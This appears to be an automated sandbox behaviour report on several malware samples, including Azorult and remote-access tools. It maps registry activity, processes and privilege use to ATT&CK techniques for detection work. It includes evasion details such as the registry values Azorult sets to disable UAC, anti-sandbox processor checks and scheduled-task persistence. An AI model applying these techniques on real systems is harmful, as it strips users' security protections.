Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 7 IoCs

defense_evasion

pid	Process
1256	timeout.exe
3880	timeout.exe
5200	timeout.exe
4484	timeout.exe
3312	timeout.exe
3464	timeout.exe
5540	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4076	ipconfig.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3112	taskkill.exe
5436	taskkill.exe
2412	taskkill.exe
2228	taskkill.exe
2008	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133878678122217278"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-167299615-4170584903-1843289874-1000\{1D367195-2CC8-4377-A79A-AE59934697F1}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-167299615-4170584903-1843289874-1000\{7AB7F0B6-C634-4B9A-A4B9-5901C2A93B0B}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-167299615-4170584903-1843289874-1000\{3A9CFD10-1D6D-472D-9E73-048158C86711}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\MIME\Database	winit.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Winlocker.csproj:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Azorult (1).exe:Zone.Identifier	msedge.exe

Runs .reg file with regedit 2 IoCs

pid	Process
3336	regedit.exe
1028	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4660	schtasks.exe
4936	schtasks.exe
4856	schtasks.exe
4788	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
6060	msedge.exe
6060	msedge.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
2292	Azorult.exe
4028	rutserv.exe
4028	rutserv.exe
4028	rutserv.exe
4028	rutserv.exe
4028	rutserv.exe
4028	rutserv.exe
5216	rutserv.exe
5216	rutserv.exe
2808	rutserv.exe
2808	rutserv.exe
2300	rutserv.exe
2300	rutserv.exe
2300	rutserv.exe
2300	rutserv.exe
2300	rutserv.exe
2300	rutserv.exe
2088	rfusclient.exe
2088	rfusclient.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe
3808	winit.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
672	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs

pid	Process
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1384	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: 33	5296	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5296	AUDIODG.EXE
Token: SeDebugPrivilege	4028	rutserv.exe
Token: SeDebugPrivilege	2808	rutserv.exe
Token: SeTakeOwnershipPrivilege	2300	rutserv.exe
Token: SeTcbPrivilege	2300	rutserv.exe
Token: SeTcbPrivilege	2300	rutserv.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	5464	powershell.exe
Token: SeDebugPrivilege	5436	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
3848	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
5824	msedge.exe
1244	ButterflyOnDesktop.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
4828	OpenWith.exe
2292	Azorult.exe
4092	wini.exe
3808	winit.exe
4028	rutserv.exe
5216	rutserv.exe
2808	rutserv.exe
2300	rutserv.exe
4856	cheat.exe
2316	taskhost.exe
4348	ink.exe
5144	P.exe
1144	R8.exe
4136	winlogon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3848 wrote to memory of 4044	3848	msedge.exe	79
PID 3848 wrote to memory of 4044	3848	msedge.exe	79
PID 3848 wrote to memory of 1040	3848	msedge.exe	80
PID 3848 wrote to memory of 1040	3848	msedge.exe	80
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 5084	3848	msedge.exe	81
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82
PID 3848 wrote to memory of 4740	3848	msedge.exe	82

System policy modification 1 TTPs 3 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Views/modifies file attributes 1 TTPs 6 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5648	attrib.exe
5800	attrib.exe
4360	attrib.exe
4164	attrib.exe
4812	attrib.exe
4636	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://www.github.com
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x298,0x7fff6ae9f208,0x7fff6ae9f214,0x7fff6ae9f220
  2⤵
  PID:4044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1900,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:11
  2⤵
  PID:1040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2080,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:2
  2⤵
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=2716 /prefetch:13
  2⤵
  PID:4740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3524,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:1
  2⤵
  PID:5416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4876,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=4884 /prefetch:1
  2⤵
  PID:1288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3552,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=4764 /prefetch:14
  2⤵
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3756,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:14
  2⤵
  PID:1596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3792,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:14
  2⤵
